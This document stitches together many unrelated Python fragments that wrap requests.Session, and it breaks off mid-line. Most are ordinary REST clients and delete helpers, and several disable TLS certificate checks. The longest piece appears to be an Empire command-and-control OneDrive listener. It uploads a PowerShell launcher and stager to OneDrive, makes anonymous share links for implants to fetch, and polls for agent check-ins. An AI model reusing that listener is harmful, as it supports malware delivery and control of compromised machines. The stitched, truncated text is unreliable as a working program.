def delete_account( couchdb_session_admin: requests.Session, couchdb_baseurl: str, account: str, ) -> requests.Response: """ Use a session_admin to delete an account. If deletion succeeds, return a "shallow" 204 Response. If the account did not exist, return a "shallow" 404 Response. If an underlying request fails, return that Response. """ # Name of a corresponding user document and database. user_doc_id = "org.couchdb.user:{}".format(account) user_database = database_for_user(user=account) # Account at least partially existed if either the user or the database existed account_existed = False # Check if the user exists. response = couchdb_session_admin.get( urljoin(couchdb_baseurl, "_users/{}".format(user_doc_id)), ) if response.ok: # The account at least partially existed account_existed = True # The user exists, issue a delete including the "_rev" we obtained. existing_user_doc = response.json() response = couchdb_session_admin.delete( urljoin(couchdb_baseurl, "_users/{}".format(user_doc_id)), headers={"If-Match": existing_user_doc["_rev"]}, ) if not response.ok: # Deletion failed, return the underlying failure return response # Check if the database exists. response = couchdb_session_admin.get( urljoin(couchdb_baseurl, user_database), ) if response.ok: # The account at least partially existed account_existed = True # The database exists, issue a delete. response = couchdb_session_admin.delete( urljoin(couchdb_baseurl, user_database)) if not response.ok: # Deletion failed, return the underlying failure return response response = requests.Response() if account_existed: # Successful deletion response.status_code = 204 else: # No account existed response.status_code = 404 return response
def get_enabled_methods(self): s = Session() headers = {} headers['User-agent'] = self.user_agent salida = [] s.mount(self.sitio, HTTPAdapter(max_retries=2)) if s.put(self.sitio, headers=headers).status_code == 200: salida.append("put") if s.get(self.sitio, headers=headers).status_code == 200: salida.append("get") if s.options(self.sitio, headers=headers).status_code == 200: salida.append("options") if s.post(self.sitio, headers=headers).status_code == 200: salida.append("post") if s.delete(self.sitio, headers=headers).status_code == 200: salida.append("delete") if s.head(self.sitio, headers=headers).status_code == 200: salida.append("head") if s.patch(self.sitio, headers=headers).status_code == 200: salida.append("patch") return salida
class JoolaBaseClient(object): def __init__(self, base_url, credentials=None, api_token=None, **kwargs): self.base_url = str(base_url) self.session = Session() self.session.mount('http://', CachingHTTPAdapter()) self.session.mount('https://', CachingHTTPAdapter()) if api_token: self.session.auth = APITokenAuth(api_token) elif credentials: self.session.auth = credentials def list(self): return self.session.get(self.base_url) def get(self, lookup): return self.session.get('%s%s' % (self.base_url, str(lookup))) def insert(self, **kwargs): return self.session.post(self.base_url, data=kwargs) def patch(self, lookup, **kwargs): return self.session.patch('%s%s' % (self.base_url, str(lookup)), data=kwargs) def delete(self, lookup): return self.session.delete('%s%s' % (self.base_url, str(lookup)))
def _delete(session: requests.Session, consumer_id: str, resource: str, resource_id: str) -> None: logger.debug( f"Delete {resource} `{resource_id}` from consumer with id = `{consumer_id}` ... " ) resp = session.delete(f"/consumers/{consumer_id}/{resource}/{resource_id}") _check_resp(resp)
def send(self, method, url, params=None, token=None): try: session = Session() session.headers = self.headers if token is not None: session.headers.update({'X-USER-TOKEN': token}) endpoint = '{base_url}/{url}'.format( base_url=self.API_ENDPOINT, url=url, ) data = json.dumps(params) if params else None if method == 'get': res = session.get(endpoint, params=data) elif method == 'post': res = session.post(endpoint, data=data) elif method == 'put': res = session.put(endpoint, data=data) elif method == 'delete': res = session.delete(endpoint) session.close() return res except HTTPError as e: self.logger.error(e)
class ImgurConnection(ImageHost): def __init__(self, handler): self.handler = handler self.session = Session() def connect(self): pass def uploadImage(self, imgname, imgbuffer, imgmime): def doRequest(): try: r = self.session.post( 'https://api.imgur.com/3/image', timeout=20, headers={'Authorization': 'Client-ID %s' % apikey}, data={ 'title': 'Pyshot screenshot', 'name': imgname }, files={'image': (imgname, imgbuffer, imgmime)}) if r.status_code != 200: raise Exception(r.json()) json = r.json() link = json['data']['link'] deleteHash = json['data']['deletehash'] def deleteJob(): def doDeleteRequest(): try: r = self.session.delete( 'https://api.imgur.com/3/image/%s' % deleteHash, timeout=20, headers={ 'Authorization': 'Client-ID %s' % apikey }, ) if r.status_code != 200: raise Exception(r.json()) self.handler.onDeleteFailure() self.handler.onDeleteSuccess() except Exception as e: print(e) self.handler.onDeleteStart() thread = threading.Thread(target=doDeleteRequest) thread.daemon = True thread.start() self.handler.onUploadSuccess(host_url=link, delete_job=deleteJob) except Exception as e: print('Upload error response:') print(e) self.handler.onUploadFailure() thread = threading.Thread(target=doRequest) thread.daemon = True thread.start()
def rename_default_branch( session: requests.Session, repo_name: str, current: str, target: str, delete_current: bool = False, ) -> None: # First, look up the SHA for the current default branch r = session.get(GITHUB_API_URL + f"/repos/{repo_name}/git/refs/heads/{current}") if r.status_code == 404: logger.info(f"no branch named {current} on {repo_name}") return r.raise_for_status() sha = r.json()["object"]["sha"] # Try to create a new branch with the name given by target r = session.post( GITHUB_API_URL + f"/repos/{repo_name}/git/refs", json={ "ref": f"refs/heads/{target}", "sha": sha }, ) if r.status_code == 422: logger.info(f"branch {target} already exists on {repo_name}") # If this branch, make sure that it has the right r = session.get(GITHUB_API_URL + f"/repos/{repo_name}/git/refs/heads/{target}") r.raise_for_status() if r.json()["object"]["sha"] != sha: logger.warning( f"the SHA of branch {target} on {repo_name} does not match " f"{current}") return else: # This happens if the repo is read-only if r.status_code == 403: return r.raise_for_status() # Rename the default branch r = session.patch( GITHUB_API_URL + f"/repos/{repo_name}", json={ "name": repo_name.split("/")[1], "default_branch": target }, ) r.raise_for_status() # Delete the existing branch if requested if delete_current: r = session.delete(GITHUB_API_URL + f"/repos/{repo_name}/git/refs/heads/{current}") r.raise_for_status()
def deleteArtifact(config, appID, artiID): http = Session() http.auth = (config['hawkbit']['user'], config['hawkbit']['password']) app_response = http.delete( url='{}/rest/v1/softwaremodules/{}/artifacts/{}'.format( config['hawkbit']['url'], appID, artiID), ) if __handle_error(app_response) != 0: exit(0)
class RestJsonClient(object): def __init__(self, hostname, use_https=True): super(RestJsonClient, self).__init__() self._hostname = hostname self._use_https = use_https self._session = Session() @property def session(self): return self._session def _build_url(self, uri): if self._hostname not in uri: if not uri.startswith('/'): uri = '/' + uri if self._use_https: url = 'https://{0}{1}'.format(self._hostname, uri) else: url = 'http://{0}{1}'.format(self._hostname, uri) else: url = uri return url def _valid(self, response): if response.status_code in [200, 201, 204]: return response elif response.status_code in [401]: raise RestClientUnauthorizedException(self.__class__.__name__, 'Incorrect login or password') else: raise RestClientException(self.__class__.__name__, 'Request failed: {0}, {1}'.format(response.status_code, response.text)) def request_put(self, uri, data): response = self._session.put(self._build_url(uri), data, verify=False) return self._valid(response).json() def request_post(self, uri, data): response = self._session.post(self._build_url(uri), json=data, verify=False) return self._valid(response).json() def request_post_files(self, uri, data, files): response = self._session.post(self._build_url(uri), data=data, files=files, verify=False) return self._valid(response).json() def request_get(self, uri): response = self._session.get(self._build_url(uri), verify=False) return self._valid(response).json() def request_get_files(self, uri): response = self._session.get(self._build_url(uri), verify=False) return self._valid(response) def request_delete(self, uri): response = self._session.delete(self._build_url(uri), verify=False) return self._valid(response).content
def delete( path: str, params: dict = None, session: Session = None, base_url: str = API_BASE_URL, **kwargs, ) -> Response: session = session or _get_api_session() resp = session.delete(base_url + path, params=params or {}, **kwargs) return resp
def delete_user_rates(self, id_user_rates: int, token: str): """ Удаялет из списка на Шики аниме :param token: token user :param id_user_rates: ID user_rate на Шики :return: Status code операции. 204 - успешно """ ses = Session() js = ses.delete(self.__BASE_URL_V2 + f'user_rates/{id_user_rates}', headers=self.__get_headers(token=token)) return js.status_code
def _send_request( sesh: requests.Session, method: str, url: str, params: Dict[str, Union[str, List[str]]], data: Any, verify: bool, timeout: int, ) -> requests.Response: with yaspin(spin): if method == GET: return(sesh.get( url, params=params, timeout=timeout, verify=verify, )) elif method == POST: return(sesh.post( url, params=params, json=data, timeout=timeout, verify=verify, )) elif method == PUT: return(sesh.put( url, params=params, json=data, timeout=timeout, verify=verify, )) elif method == PATCH: return(sesh.patch( url, params=params, json=data, timeout=timeout, verify=verify, )) elif method == DELETE: return(sesh.delete( url, params=params, json=data, timeout=timeout, verify=verify, )) else: raise APIBuddyException( title='Something went wrong', message='Try a different http method' )
class Flowdock: """Simple wrapper for Flowdock REST API.""" API_URL = "https://api.flowdock.com" def __init__(self, api_key, debug=False, print_function=None): """Initialize Flowdock API wrapper. @param debug Print debug info if True @param print_function Use this function to print debug info. By default use python builtin print. Mainly for using click.echo without requiring click as dependency. """ self.session = Session() # requests accepts http basic auth as tuple (user, pass), however, # Flowdoc uses only api key as username without password self.session.auth = (api_key, None) self.debug = debug self.print = print_function if print_function else print def get_organizations(self): """Get list of organizations this user has access to""" url = "{}/organizations".format(self.API_URL) if self.debug: self.print("Sending GET request to URL {}".format(url)) r = self.session.get(url) r.raise_for_status() return r.json() def find_user_orgs(self, email): """Find organizations this user belongs to""" orgs = self.get_organizations() return [org for org in orgs if Flowdock.user_in_org(email, org)] @staticmethod def user_in_org(email, org): """Chek if user is part of organization""" for user in org['users']: if user['email'] == email: return True return False def delete_user_from_org(self, user, org): url = "{}/organizations/{}/users/{}".format(self.API_URL, org['parameterized_name'], user['id']) if self.debug: self.print("Sending DELETE request to url {}".format(url)) r = self.session.delete(url) r.raise_for_status() def close(self): self.session.close()
class HTTPStorage(Storage): def __init__(self, base_url=None): self._base_url = base_url if not self._session: self._session = Session() def _value_or_setting(self, value, setting): return setting if value is None else value @cached_property def base_url(self): if self._base_url is not None and not self._base_url.endswith('/'): self._base_url += '/' return self._value_or_setting(self._base_url, settings.MEDIA_URL) def _url(self, name): url = urljoin(self.base_url, name.lstrip("/")) assert (url.startswith(self.base_url)) return url def url(self, name): return self._url(name) def delete(self, name): self._session.delete(self._url(name)) def exists(self, name): r = self._session.head(self._url(name)) if r.status_code >= 200 and r.status_code < 300: return True if r.status_code == 404: return False r.raise_for_status() def _save(self, name, content): self._session.put(self._url(name), data=content) return name def _open(name, mode='rb'): raise NotImplementedError() # TODO
def delete(resource: str, session: requests.Session, id_: str) -> None: assert resource in ( "consumers", "services", "routes", "plugins", "key-auths", "basic-auths", ) logger.debug(f"Delete `{resource}` with id = `{id_}` ... ") resp = session.delete(f"/{resource}/{id_}") _check_resp(resp)
class HTTPClient(abstract_http_client.AbstractHTTPClient): def __init__(self, base_url, user_name, user_pass='', http_debug_enabled=False): """Initialize a new paymill interface connection. Requires a private key.""" self.base_url = base_url self.session = Session() self.session.auth = (user_name, "") self.session.verify = False self.operations = dict(GET=self.get, POST=self.post, PUT=self.put, DELETE=self.delete) #for internal usage self.response = None http_debug(enabled=http_debug_enabled) def __call__(self, request_type, params, url, return_type): try: return self.operations[request_type](params, url, return_type) except ValueError as v: # JSON encoding failed #=>PAYMILL API sent us an error, without JSON data if self.response is not None: raise PMError(self.response.content, self.response.status_code) else: raise PMError() def put(self, params, url, return_type): return self._check_reponse(self.session.put(self.base_url + url, params, hooks=dict(response=self._request_callback)).json(), return_type) def post(self, params, url, return_type): json = self.session.post(self.base_url + url, params, hooks=dict(response=self._request_callback)).json() return self._check_reponse(json, return_type) def delete(self, params, url, return_type): return self._check_reponse(self.session.delete(self.base_url + url, params=params, hooks=dict(response=self._request_callback)).json(), return_type) def get(self, params, url, return_type): return self._check_reponse(self.session.get(self.base_url + url, params=params, hooks=dict(response=self._request_callback)).json(), return_type) def _request_callback(self, r, *args, **kwargs): self.response = r def _check_reponse(self, json_data, return_type): if 'data' in json_data: #success if isinstance(json_data['data'], dict): return return_type(json_data['data']) else: return return_type(json_data) else: #error raise PMError(json_data, self.response.status_code)
def deleteTask(taskId): url = f'https://habitica.com/api/v3/tasks/{taskId}' session = Session() try: response = session.delete(url, headers=apiHeader) data = json.loads(response.text) #print(json.dumps(data, indent=4, sort_keys=True)) except (ConnectionError, Timeout, TooManyRedirects) as error: print(error)
class REST(object): __metaclass__ = Singleton def __init__(self, user='', password='', content_type=r'application/yang.data+json'): self._session = None self._response = None self.response_code = None self.response_as_json = None self.response_as_text = None self._create_session(user=user, password=password, content_type=content_type) def _create_session(self, user, password, content_type): self._session = Session() self._session.auth = (user, password) self._session.headers["Content-Type"] = content_type # print("REQUEST HEADER = ", self._session.headers) def send_get_request(self, url): self._response = self._session.get(url) self.response_code = self._response.status_code #self.response_as_text = ast.literal_eval(self._response.text) #self.response_as_text = json.loads(self._response.text) self.response_as_text = self._response.text def send_post_request(self, url, data): #if type(data) != str: #data = json.dumps(data) self._response = self._session.post(url=url, data=data) self.response_code = self._response.status_code self.response_as_text = self._response.text def send_put_request(self, url, data): self._response = self._session.put(url=url, data=data) self.response_code = self._response.status_code self.response_as_text = self._response.text def send_delete_request(self, url): self._response = self._session.delete(url=url) self.response_code = self._response.status_code self.response_as_text = self._response.text @property def session(self): return self._session
class HttpClient: def __init__(self): self.__session = Session() def get(self, url, **kwargs): return self.__session.get(url, **kwargs) def post(self, url, data, json=None, **kwargs): return self.__session.post(url, data, json, **kwargs) def delete(self, url, **kwargs): return self.__session.delete(url, **kwargs) def put(self, url, data, **kwargs): return self.__session.put(url, data, **kwargs) def get_headers(self): return self.__session.headers def set_headers(self, k, v): self.__session.headers[k] = v def get_cookies(self): return self.__session.cookies def set_cookies(self, cookies): # from requests.cookies import RequestsCookieJar # url = "http://fanyi.baidu.com/v2transapi" # cookies = RequestsCookieJar() # cookies.set("BAIDUID", "B1CCDD4B4BC886BF99364C72C8AE1C01:FG=1", domain="baidu.com") self.__session.cookies = merge_cookies(self.__session.cookies, cookies) def get_auth(self): return self.__session.auth def set_auth(self, auth): # from requests.auth import HTTPBasicAuth # auth=HTTPBasicAuth('user', 'pass') self.__session.auth = auth def set_proxy(self, proxies): # proxies = {'http': 'http://localhost:8888', 'https': 'http://localhost:8888'} self.__session.proxies = proxies def get_proxy(self): return self.__session.proxies def close(self): self.__session.close()
class CRequests: def __init__(self, CONNECT_TIMEOUT=CONNECT_TIMEOUT, READ_TIMEOUT=READ_TIMEOUT, stream=False): self.requests = Session() self.requests.stream = stream self.requests.trust_env = False self.requests.mount('http://', adapters.HTTPAdapter(pool_connections=NUM_POOLS, pool_maxsize=POOL_MAXSIZE)) self.requests.mount('https://', adapters.HTTPAdapter(pool_connections=NUM_POOLS, pool_maxsize=POOL_MAXSIZE)) self.tuple = (CONNECT_TIMEOUT, READ_TIMEOUT) def request(self, method, url, **kwargs): kwargs.setdefault('timeout', self.tuple) return self.requests.request(method, url, **kwargs) def get(self, url, **kwargs): kwargs.setdefault('timeout', self.tuple) return self.requests.get(url, **kwargs) def options(self, url, **kwargs): kwargs.setdefault('timeout', self.tuple) return self.requests.options(url, **kwargs) def head(self, url, **kwargs): kwargs.setdefault('timeout', self.tuple) return self.requests.head(url, **kwargs) def post(self, url, data=None, json=None, **kwargs): kwargs.setdefault('timeout', self.tuple) return self.requests.post(url, data=data, json=json, **kwargs) def put(self, url, data=None, **kwargs): kwargs.setdefault('timeout', self.tuple) return self.requests.put(url, data=data, **kwargs) def patch(self, url, data=None, **kwargs): kwargs.setdefault('timeout', self.tuple) return self.requests.patch(url, data=data, **kwargs) def delete(self, url, **kwargs): kwargs.setdefault('timeout', self.tuple) return self.requests.delete(url, **kwargs) def close(self): self.requests.close()
class GistClient(BaseClient): session: Session base_url: str def __init__(self): self.session = Session() self.session.headers["accept"] = "application/vnd.github.v3+json" self.session.headers["Authorization"] = f"token {config.GITHUB_TOKEN}" self.base_url = config.API_URL def get_all_gists_for_user(self, username: str): endpoint: str = f"{self.base_url}/users/{username}/gists" req = self.session.get(endpoint) return self.get_response(req, 200) def get_gist_with_id(self, gist_id: str): endpoint: str = f"{self.base_url}/gists/{gist_id}" req = self.session.get(endpoint) return self.get_response(req, 200) def create_gist(self, description: str, files: Dict): endpoint: str = f"{self.base_url}/gists" body_params: Dict = { "description": description, "files": files, "public": False } req = self.session.post(endpoint, json=body_params) return self.get_response(req, 201) def update_gist(self, gist_id: str, description: str, files: Dict): endpoint: str = f"{self.base_url}/gists/{gist_id}" body_params: Dict = { "description": description, "files": files, "public": False } req = self.session.patch(endpoint, json=body_params) return self.get_response(req, 200) def delete_gist(self, gist_id: str): endpoint: str = f"{self.base_url}/gists/{gist_id}" req = self.session.delete(endpoint) return self.get_response(req, 204)
class RRemote: ROBOT_LIBRARY_SCOPE = "SUITE" def __init__(self, url): self.s = Session() self.url = url response = self.s.get(f"{self.url}/create_instance") self.s.headers = {"x-instance-id": response.headers["x-instance-id"]} def get_keyword_names(self): response = self.s.get(f"{self.url}/get_keyword_names") return response.json() def run_keyword(self, name, args, kwargs): response = self.s.post( f"{self.url}/run_keyword", data=dumps({ "name": name, "args": args, "kwargs": kwargs }), headers={"Content-Type": "application/octet-stream"}, ) result = RemoteResult(**loads(response.content)) sys.stdout.write(result.output) if result.status != "PASS": raise RemoteError(result.error, result.traceback, result.fatal, result.continuable) return result.return_ def get_keyword_arguments(self, name): response = self.s.get(f"{self.url}/get_keyword_arguments/?name={name}") return response.json() def get_keyword_documentation(self, name): response = self.s.get( f"{self.url}/get_keyword_documentation/?name={name}") return response.text def __del__(self): response = self.s.delete(f"{self.url}/delete_instance")
class SyncRequests: def __init__(self, **kwargs): """ To set the proxy: if proxy: # conditionally detect proxy setting if proxy.startswith("https://"): self.session.proxies = {"https": proxy[8:]} elif proxy.startswith("http://"): self.session.proxies = {"http": proxy[7:]} else: self.session.proxies = {"http": proxy} :param max_workers: :param proxy: only one proxy is supported with urllib3. """ from requests import Session self.session = Session(**kwargs) def get(self, *args, **kwargs): _ = self.session.get(*args, **kwargs) return Response(_) def put(self, *args, **kwargs): _ = self.session.put(*args, **kwargs) return Response(_) def post(self, *args, **kwargs): _ = self.session.post(*args, **kwargs) return Response(_) def delete(self, *args, **kwargs): _ = self.session.delete(*args, **kwargs) return Response(_) def fetch(self, *args, **kwargs): _ = self.session.fetch(*args, **kwargs) return Response(_)
def delete(url: str, params: dict = None, headers: dict = None, data: dict = None, timeout: int = 2, log: str = None, session: requests.Session = None, **kwargs) -> Union[requests.Response, None]: if params: url += f"?{urlencode(params)}" try: if session: res = session.delete(url=url, json=data, headers=headers, timeout=timeout) else: res = requests.delete(url=url, json=data, headers=headers, timeout=timeout) if log: logs.log(message=f"DELETE {url}, Body: {data}", level=log) logs.log(message=f"Response: {res}", level=("error" if not res else log)) return res # use json= rather than data= to convert single-quoted dict to double-quoted JSON except requests.exceptions.Timeout: return None
class Heroku: def __init__(self, api_key): self.session = Session() self.api_key = api_key def reload_app(self, app_name): return self.session.delete(f'https://api.heroku.com/apps/{app_name}/dynos', headers={'Content-Type': 'application/json', 'Accept': 'application/vnd.heroku+json; version=3', 'Authorization': f'Bearer {self.api_key}'}) def get_logs(self, app_name, lines=100000): x = self.session.post(f'https://api.heroku.com/apps/{app_name}/log-sessions', data=json.dumps({'lines': lines}), headers={'Content-Type': 'application/json', 'Accept': 'application/vnd.heroku+json; version=3', 'Authorization': f'Bearer {self.api_key}'}) if x.status_code >= 400: return x logs = x.json()['logplex_url'] logs = self.session.get(logs) return logs.text
class APISession(object): def __init__(self, username, password, host, max_retries=3): self.__host = host self.__session = Session() self.__session.auth = (username, password) self.__session.headers.update(HEADERS) self.__session.mount('http://', HTTPAdapter(max_retries=max_retries)) self.__session.mount('https://', HTTPAdapter(max_retries=max_retries)) self.verify_ssl = False def post(self, uri, data, headers={}): url = self.__host + uri logger.debug("{}-{}".format(url, data)) resp = self.__session.post(url, data=data, headers=headers, verify=self.verify_ssl) return resp def get(self, uri, data): url = self.__host + uri logger.debug("{}-{}".format(url, data)) resp = self.__session.get(url, data=data, verify=self.verify_ssl) return resp def put(self, uri, data): url = self.__host + uri logger.debug("{}-{}".format(url, data)) resp = self.__session.put(url, data=data, verify=self.verify_ssl) return resp def delete(self, uri, data): url = self.__host + uri logger.debug("{}-{}".format(url, data)) resp = self.__session.delete(url, data=data, verify=self.verify_ssl) return resp
class Connection: def __init__( self, host, port, auth_type=REQUEST.AUTH_TYPE.BASIC, scheme=REQUEST.SCHEME.HTTPS, auth=None, pool_maxsize=20, pool_connections=20, pool_block=True, base_url="", response_processor=None, session_headers=None, retries_enabled=True, **kwargs, ): """Generic client to connect to server. Args: host (str): Hostname/IP address port (int): Port to connect to pool_maxsize (int): The maximum number of connections in the pool pool_connections (int): The number of urllib3 connection pools to cache pool_block (bool): Whether the connection pool should block for connections base_url (str): Base URL scheme (str): http scheme (http or https) response_processor (dict): response processor dict session_headers (dict): session headers dict auth_type (str): auth type that needs to be used by the client auth (tuple): authentication retries_enabled (bool): Flag to perform retries (default: false) Returns: Raises: """ self.base_url = base_url self.host = host self.port = port self.session_headers = session_headers or {} self._pool_maxsize = pool_maxsize self._pool_connections = pool_connections self._pool_block = pool_block self.session = None self.auth = auth self.scheme = scheme self.auth_type = auth_type self.response_processor = response_processor self.retries_enabled = retries_enabled def connect(self): """Connect to api server, create http session pool. Args: Returns: api server session Raises: """ if self.retries_enabled: retry_strategy = Retry( total=3, status_forcelist=[429, 500, 502, 503, 504], method_whitelist=[ "GET", "PUT", "DELETE", "POST", ], ) http_adapter = HTTPAdapter( pool_block=bool(self._pool_block), pool_connections=int(self._pool_connections), pool_maxsize=int(self._pool_maxsize), max_retries=retry_strategy, ) else: http_adapter = HTTPAdapter( pool_block=bool(self._pool_block), pool_connections=int(self._pool_connections), pool_maxsize=int(self._pool_maxsize), ) self.session = Session() if self.auth and self.auth_type == REQUEST.AUTH_TYPE.BASIC: self.session.auth = self.auth self.session.headers.update({"Content-Type": "application/json"}) self.session.mount("http://", http_adapter) self.session.mount("https://", http_adapter) self.base_url = build_url(self.host, self.port, scheme=self.scheme) LOG.debug("{} session created".format(self.__class__.__name__)) return self.session def close(self): """ Close the session. Args: None Returns: None """ self.session.close() def _call( self, endpoint, method=REQUEST.METHOD.POST, cookies=None, request_json=None, request_params=None, verify=True, headers=None, files=None, timeout=(5, 30), # (connection timeout, read timeout) ignore_error=False, warning_msg="", ): """Private method for making http request to calm Args: endpoint (str): calm server endpoint method (str): calm server http method cookies (dict): cookies that need to be forwarded. request_json (dict): request data request_params (dict): request params Returns: (tuple (requests.Response, dict)): Response """ if request_params is None: request_params = {} request_json = request_json or {} LOG.debug("""Server Request- '{method}' at '{endpoint}' with body: '{body}'""".format(method=method, endpoint=endpoint, body=request_json)) res = None err = None try: res = None url = build_url(self.host, self.port, endpoint=endpoint, scheme=self.scheme) LOG.debug("URL is: {}".format(url)) base_headers = self.session.headers if headers: base_headers.update(headers) if method == REQUEST.METHOD.POST: if files is not None: request_json.update(files) m = MultipartEncoder(fields=request_json) res = self.session.post( url, data=m, verify=verify, headers={"Content-Type": m.content_type}, timeout=timeout, ) else: res = self.session.post( url, params=request_params, data=json.dumps(request_json), verify=verify, headers=base_headers, cookies=cookies, timeout=timeout, ) elif method == REQUEST.METHOD.PUT: res = self.session.put( url, params=request_params, data=json.dumps(request_json), verify=verify, headers=base_headers, cookies=cookies, timeout=timeout, ) elif method == REQUEST.METHOD.GET: res = self.session.get( url, params=request_params or request_json, verify=verify, headers=base_headers, cookies=cookies, timeout=timeout, ) elif method == REQUEST.METHOD.DELETE: res = self.session.delete( url, params=request_params, data=json.dumps(request_json), verify=verify, headers=base_headers, cookies=cookies, timeout=timeout, ) res.raise_for_status() if not url.endswith("/download"): if not res.ok: LOG.debug("Server Response: {}".format(res.json())) except ConnectTimeout as cte: LOG.error( "Could not establish connection to server at https://{}:{}.". format(self.host, self.port)) LOG.debug("Error Response: {}".format(cte)) sys.exit(-1) except Exception as ex: LOG.debug("Got traceback\n{}".format(traceback.format_exc())) if hasattr(res, "json") and callable(getattr(res, "json")): try: err_msg = res.json() except Exception: err_msg = "{}".format(ex) pass elif hasattr(res, "text"): err_msg = res.text else: err_msg = "{}".format(ex) status_code = res.status_code if hasattr(res, "status_code") else 500 err = {"error": err_msg, "code": status_code} if ignore_error: if warning_msg: LOG.warning(warning_msg) return None, err LOG.error("Oops! Something went wrong.\n{}".format( json.dumps(err, indent=4, separators=(",", ": ")))) return res, err
def start_server(self, listenerOptions): # Utility functions to handle auth tasks and initial setup def get_token(client_id, client_secret, code): params = { 'client_id': client_id, 'client_secret': client_secret, 'grant_type': 'authorization_code', 'scope': 'files.readwrite offline_access', 'code': code, 'redirect_uri': redirect_uri } try: r = s.post( 'https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params) r_token = r.json() r_token['expires_at'] = time.time() + (int)( r_token['expires_in']) - 15 r_token['update'] = True return r_token except KeyError as e: print( helpers.color( "[!] Something went wrong, HTTP response %d, error code %s: %s" % (r.status_code, r.json()['error_codes'], r.json()['error_description']))) raise def renew_token(client_id, client_secret, refresh_token): params = { 'client_id': client_id, 'client_secret': client_secret, 'grant_type': 'refresh_token', 'scope': 'files.readwrite offline_access', 'refresh_token': refresh_token, 'redirect_uri': redirect_uri } try: r = s.post( 'https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params) r_token = r.json() r_token['expires_at'] = time.time() + (int)( r_token['expires_in']) - 15 r_token['update'] = True return r_token except KeyError as e: print( helpers.color( "[!] Something went wrong, HTTP response %d, error code %s: %s" % (r.status_code, r.json()['error_codes'], r.json()['error_description']))) raise def test_token(token): headers = s.headers.copy() headers['Authorization'] = 'Bearer ' + token request = s.get("%s/drive" % base_url, headers=headers) return request.ok def setup_folders(): if not (test_token(token['access_token'])): raise ValueError( "Could not set up folders, access token invalid") base_object = s.get("%s/drive/root:/%s" % (base_url, base_folder)) if not (base_object.status_code == 200): print(helpers.color("[*] Creating %s folder" % base_folder)) params = { '@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': base_folder } base_object = s.post("%s/drive/items/root/children" % base_url, json=params) else: message = "[*] {} folder already exists".format(base_folder) signal = json.dumps({'print': True, 'message': message}) dispatcher.send( signal, sender="listeners/onedrive/{}".format(listener_name)) for item in [staging_folder, taskings_folder, results_folder]: item_object = s.get("%s/drive/root:/%s/%s" % (base_url, base_folder, item)) if not (item_object.status_code == 200): print( helpers.color("[*] Creating %s/%s folder" % (base_folder, item))) params = { '@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': item } item_object = s.post("%s/drive/items/%s/children" % (base_url, base_object.json()['id']), json=params) else: message = "[*] {}/{} already exists".format( base_folder, item) signal = json.dumps({'print': True, 'message': message}) dispatcher.send( signal, sender="listeners/onedrive/{}".format(listener_name)) def upload_launcher(): ps_launcher = self.mainMenu.stagers.generate_launcher( listener_name, language='powershell', encode=False, userAgent='none', proxy='none', proxyCreds='none') r = s.put( "%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "LAUNCHER-PS.TXT"), data=ps_launcher, headers={"Content-Type": "text/plain"}) if r.status_code == 201 or r.status_code == 200: item = r.json() r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']), json={ "scope": "anonymous", "type": "view" }, headers={"Content-Type": "application/json"}) launcher_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json( )['shareId'] def upload_stager(): ps_stager = self.generate_stager(listenerOptions=listener_options, language='powershell', token=token['access_token']) r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "STAGE0-PS.txt"), data=ps_stager, headers={"Content-Type": "application/octet-stream"}) if r.status_code == 201 or r.status_code == 200: item = r.json() r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']), json={ "scope": "anonymous", "type": "view" }, headers={"Content-Type": "application/json"}) stager_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json( )['shareId'] # Different domain for some reason? self.mainMenu.listeners.activeListeners[listener_name][ 'stager_url'] = stager_url else: print( helpers.color("[!] Something went wrong uploading stager")) message = r.content signal = json.dumps({'print': True, 'message': message}) dispatcher.send( signal, sender="listeners/onedrive/{}".format(listener_name)) listener_options = copy.deepcopy(listenerOptions) listener_name = listener_options['Name']['Value'] staging_key = listener_options['StagingKey']['Value'] poll_interval = listener_options['PollInterval']['Value'] client_id = listener_options['ClientID']['Value'] client_secret = listener_options['ClientSecret']['Value'] auth_code = listener_options['AuthCode']['Value'] refresh_token = listener_options['RefreshToken']['Value'] base_folder = listener_options['BaseFolder']['Value'] staging_folder = listener_options['StagingFolder']['Value'].strip('/') taskings_folder = listener_options['TaskingsFolder']['Value'].strip( '/') results_folder = listener_options['ResultsFolder']['Value'].strip('/') redirect_uri = listener_options['RedirectURI']['Value'] base_url = "https://graph.microsoft.com/v1.0" s = Session() if refresh_token: token = renew_token(client_id, client_secret, refresh_token) message = "[*] Refreshed auth token" signal = json.dumps({'print': True, 'message': message}) dispatcher.send( signal, sender="listeners/onedrive/{}".format(listener_name)) else: token = get_token(client_id, client_secret, auth_code) message = "[*] Got new auth token" signal = json.dumps({'print': True, 'message': message}) dispatcher.send(signal, sender="listeners/onedrive") s.headers['Authorization'] = "Bearer " + token['access_token'] setup_folders() while True: # Wait until Empire is aware the listener is running, so we can save our refresh token and stager URL try: if listener_name in list( self.mainMenu.listeners.activeListeners.keys()): upload_stager() upload_launcher() break else: time.sleep(1) except AttributeError: time.sleep(1) while True: time.sleep(int(poll_interval)) try: # Wrap the whole loop in a try/catch so one error won't kill the listener if time.time() > token[ 'expires_at']: # Get a new token if the current one has expired token = renew_token(client_id, client_secret, token['refresh_token']) s.headers[ 'Authorization'] = "Bearer " + token['access_token'] message = "[*] Refreshed auth token" signal = json.dumps({'print': True, 'message': message}) dispatcher.send( signal, sender="listeners/onedrive/{}".format(listener_name)) upload_stager() if token['update']: self.mainMenu.listeners.update_listener_options( listener_name, "RefreshToken", token['refresh_token']) token['update'] = False search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, staging_folder)) for item in search.json( )['children']: # Iterate all items in the staging folder try: reg = re.search("^([A-Z0-9]+)_([0-9]).txt", item['name']) if not reg: continue agent_name, stage = reg.groups() if stage == '1': # Download stage 1, upload stage 2 message = "[*] Downloading {}/{}/{} {}".format( base_folder, staging_folder, item['name'], item['size']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) content = s.get( 